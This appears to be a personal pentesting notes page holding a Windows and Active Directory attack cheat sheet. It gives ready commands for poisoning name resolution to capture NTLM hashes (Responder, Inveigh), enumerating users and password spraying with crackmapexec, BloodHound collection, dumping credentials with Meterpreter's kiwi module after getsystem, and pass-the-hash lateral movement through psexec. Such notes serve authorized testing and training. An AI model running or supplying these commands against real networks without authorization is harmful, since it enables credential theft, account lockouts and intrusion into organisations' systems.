Windows Pentest

A guide for Windows system enumeration and post-exploitation techniques.

Attacking Methods

Network

# Capture NTLM hashes with Responder
responder -I <interface> -P -r -v    # -P: Poison, -r: answers requests, -v: verbose
# Capture NTLM hashes with Inveigh
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 172.16.7.50 -FileOutput Y
# or execute directly
Inveigh.exe

User

Requires one valid domain user:

# List domain users
crackmapexec smb <DC-IP> --users -u <username> -p <password>
# Extract usernames to file
cat users.txt | awk '{ print $5 }' | cut -d '\' -f2 > valid_users.txt
# Password spraying (use with caution - may lock accounts)
crackmapexec smb <DC-IP> -u valid_users.txt -p <password>

Active Directory

# BloodHound collection
bloodhound-python -u '<username>' -p '<password>' \
  -ns <DC-IP> \
  -d <domain> \
  -c all \
  --zip

Post-Exploitation

Mimikatz:

# Elevate to SYSTEM
getsystem
# Load Mimikatz in Meterpreter
load kiwi
creds_all    # Dump credentials

Lateral Movement:
With Administrator credentials, use psexec to move laterally: Hash Format Requirement:

Correct format: [LM hash]:[NT hash]

Example: 00000000000000000000000000000000:actualNTLMhashhere
# Perform directly on Meterpreter
use exploit/windows/smb/psexec
set RHOST
set SMBUser Administrator
set SMBPass <hash_with_0s>
set LHOST

Recent Notes

Havoc C2 Exploitation Analysis

Exegol

Conversation, How?

Explorer

Windows Pentest

Attacking Methods

Network

User

Active Directory

Post-Exploitation

Explorer

Graph View

Table of Contents